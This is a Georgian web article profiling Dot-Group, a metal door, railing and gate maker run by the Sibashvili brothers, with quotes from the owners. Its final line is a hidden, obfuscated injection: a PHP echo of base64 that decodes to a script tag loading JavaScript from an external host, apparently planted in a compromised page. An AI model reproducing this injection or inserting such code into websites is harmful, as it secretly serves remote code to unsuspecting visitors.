celsiusi
ავერსი საქკაბელი
ძმები, ოთარი და თორნიკე სიბაშვილების ბიზნესი-ისტორია, 2019 წლიდან იწყება და ამ წლების განმავლობაში წარმატებით ვითარდება. ძმები სიბაშვილების ბიზნესის ისტორია იმითაა საინტერესო, რომ მათ კომპანიის დაარსებიდან მალევე მოიპოვეს მომხმარებელთა ნდობა. 
 
"მე და ჩემი ძმა წლების განმავლობაში ამ სფეროში სხვა კომპანიაში ვმუშაობდით. დაგროვილი გამოცდილებიდან გამომდინარე გადავწყვიტეთ ჩვენ - ჩვენი კომპანია დაგვეფუძნებინა და ოპერირება დამოუკიდებლად დაგვეწყო. გულწრფელად გეტყვით, რომ ჩვენი საქმისგან ისეთ სიამოვნებას ვიღებთ, რომ სხვა მიმართულებით მუშაობა ვერც წარმოგვიდგენია. საინტერესოა იმითაც, რომ ქმნი შენი გემოვნებით და დიზაინით პროდუქტს, შენი მეგობარი ხდება ლითონი, რომელსაც შენი ხელით ლამაზ ორნომეტრად ქმნი", - გვიყვება ოთარ სიბაშვილი. 
 
კომპანია Dot-Group მომხმარებლებს ლითონის ორიგინალური ფორმის და დიზაინის კარებს, მოაჯირეებს და ჭიშკრებს სთავაზობს.  
 
"თამამად შემიძლია გითხრათ, რომ ჩვენ მომხმარებლებს ვთავაზობთ სრულ ხარისხიან სერვისს. ჩვენს მიერ შექმნილი ნაკეთობები გამოირჩევა ორიგინალურობით. ჩვენ სტილში გაკეთებულ კარებს, თუ ჭიშკრებს ვერსად  ნახავთ. ეს კი გამოგვარჩვებს ყველასგან. ჩვენ - ჩვენი ხაზი, ნიშა გვაქვს და მარტივია ჩვენი შემჩნევა", - ამბობს ოთო სიბაშვილი. 
 
კომაპნიაში ამ დროისთვის დასაქმებულია ათი ადამიანი. როგორც კომპანიაში აცხადებენ, მათი მიზანი გაფართოება და დამატებით ადამიანების დასაქმებაა. 
 
"ჩვენი მიზანი, რა თქმა უნდა, კიდევ უფრო განვითარება და გაფართოება იქნება. ჯერ კიდევ ახალგაზრდები ვართ, მაგრამ ჯანსაღი ამბიციის კომპანიას წარმოვაგენთ, სადაც მთავარი ხაზია მუდმივი განვითარება, ჩვენი ნაკეთობების კიდევ უფრო დახვეწა და განსხვავებულობის შენარჩუნება. ასევე, მომხმარებლისთვის აუცილებელია დათაქმულ დროში ჩააბარო შეკვეთა. ამ მხრივ, ჩვენ გამართული გვაქვს სერვისი და არ ყოფილა შემთხვევა, როდესაც დაგვიანება მომხდარიყო” - განმარტავს კომპანიის ხელმძღვანელი.
 
კითხვაზე, ძირითადად რა ტიპის შეკვეთებით ინტერესდებიან მომხმარებლები და რა საფასო პოლიტიკას ატარებს კომპანია, ასე გვიპასუხეს: 
 
"ჩვენი საფასო პოლიტიკა სრულიად მორგებულია მომხმარებლის მოთხოვნაზე. ხარისხი და ფასი შესაბამისობაშია. რაც შეეხება, შეკვეთებს, სახლის კარები, ჭიშკრები და მოაჯირები აინტერესებს მომხმარებელს. დაინტერესების შემთვევაში, Dot-Group პოვნა ძალიან მარტივია და ყველა სირთულის სამუშაოების შესრულება შეგვიძლია", - ამბობს ოთარ სიბაშვილი.
 
კომპანიის მიერ შესრულებულ რამდენიმე ნამუშევარს გთავაზობთ:
 
 
 
 
 
 
უფრო მეტის ნახვა შეგიძლიათ აქ: https://www.facebook.com/dotgroupgeo
 
 
3166
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");